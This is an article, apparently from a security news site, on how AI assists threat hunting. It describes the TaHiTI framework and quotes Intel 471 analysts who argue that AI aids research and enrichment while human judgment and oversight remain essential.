The Real Role Of AI In Modern Threat Hunting

The increasing presence of Artificial Intelligence (AI) in various aspects of life, including cybersecurity, has sparked debate about its potential to revolutionize threat hunting. While AI is being touted as a game-changer in the field, it’s essential to separate hype from reality and understand its actual capabilities and limitations.

The Role of AI in Threat Hunting

AI is indeed a powerful tool that can aid in threat hunting by speeding up research, enrichment, and reporting. However, it’s crucial to remember that human judgment remains essential in separating real threats from noise. The complexity of cybersecurity threats requires a nuanced approach, and AI should be seen as a co-pilot rather than an autopilot.

The use of AI in threat hunting is not a new concept, but its application has evolved significantly over the past year. Many companies have begun experimenting with agentic AI to automate workflows and plug skills gaps, while attackers are using AI to polish phishing lures, generate deepfakes, and even script parts of data extortion campaigns. Nevertheless, the idea of AI-driven kill chains outpacing human defenders is still more science fiction than fact.

Understanding TaHiTI

One of the most interesting aspects of AI’s emerging role in threat hunting is the development of frameworks like TaHiTI (Targeted Hunting integrating Threat Intelligence). This framework, developed in the financial sector, breaks down hunting into three phases: Initiate, Hunt, and Finalize. TaHiTI is vendor-neutral and forces structure on what can otherwise be chaotic work, making it an effective tool for threat hunters.

According to Scott Poley, a senior threat hunt analyst at Intel 471, TaHiTI works precisely because it reflects the cyclical nature of hunts. AI can speed up the process, but it can’t replace the institutional knowledge that separates theory from reality. Poley emphasizes the importance of using AI as a sounding board, not an oracle, and taking a step-by-step approach to validate or challenge hypotheses.

AI’s Strengths and Limitations

AI’s biggest strengths in threat hunting lie in hypothesis development and expedited research. It can help junior analysts by surfacing behaviors or techniques that senior analysts already recognize as relevant, bridging the skills gap. However, AI often struggles with syntax or optimization, and Poley has had to correct AI-generated queries himself.

Where AI really shines is in enrichment, helping to expand the perspective and link activity to adjacent threat actor techniques or surfacing aliases in PowerShell that a hunter might overlook. Nevertheless, the quality of data is crucial, and if logs only go back 30 or 60 days, AI will just amplify the gaps. Lee Archinal, also a senior threat hunt analyst at Intel 471, stresses that AI is best seen as a tool to make tasks easier, not as a replacement for human expertise.

The Future of AI in Threat Hunting

Looking forward, AI’s role in retrospective analysis and playbooks may prove most valuable. Running yesterday’s hunt against 90 days of logs to spot trends or test hypotheses is grunt work tailor-made for AI. Over time, that history can even train systems to suggest “next steps” based on what worked in similar cases.

However, automation should reflect human decisions, not replace them. Poley gives the example of disabling an account, which might stop an attacker but also break a core business process if done at the wrong time. That’s a decision no AI should make without human oversight. The lesson is that AI is here to stay in threat hunting, but it belongs in the loop, not on the trigger.